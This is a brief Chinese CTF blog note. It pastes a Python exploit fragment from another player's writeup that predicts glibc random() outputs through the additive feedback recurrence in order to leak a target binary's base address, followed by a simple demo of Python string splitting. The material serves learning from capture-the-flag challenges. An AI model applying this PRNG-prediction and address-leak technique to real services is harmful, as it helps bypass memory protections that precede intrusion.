http://www.mutepig.club/index.php/archives/61/
这里是原理的推导,下面根据dalao的writeup,贴出py代码
def guess(i):
p.sendline('5')
p.recvuntil('> ')
p.sendline(str(i))
res = p.recvline()
p.recvuntil('> ')
num = res.split()[-1][:-1]
return int(num)
print '[+]guess'
p.recvuntil('> ')
baseAddr = 0
lstRand = []
#先获取前31个随机数
for i in range(31):
lstRand.append(guess(i))
#因为偶尔会有1的误差,所以猜3次
for i in range(31, 33):
rnd = (lstRand[i-3] + lstRand[i-31]) & 0x7fffffff
p.sendline('5')
p.recvuntil('> ')
p.sendline(str(rnd))
tmp = p.recvline()
if 'G00dj0b' in tmp:
baseAddr = int(tmp.split()[-1][:-1]) - 0x202148
p.recvuntil('> ')
break
p.recvuntil('> ')
print '[+]baseAddr:' + hex(baseAddr)
记录一个py的使用方法
s = 'Wr0ng answer!The number is 499183478!'
print s.split()
print s.split()[0]
print s.split()[-1]
print s.split()[-1][:-1]
print s.split()[-1][:-2]
['Wr0ng', 'answer!The', 'number', 'is', '499183478!']
Wr0ng
499183478!
499183478
49918347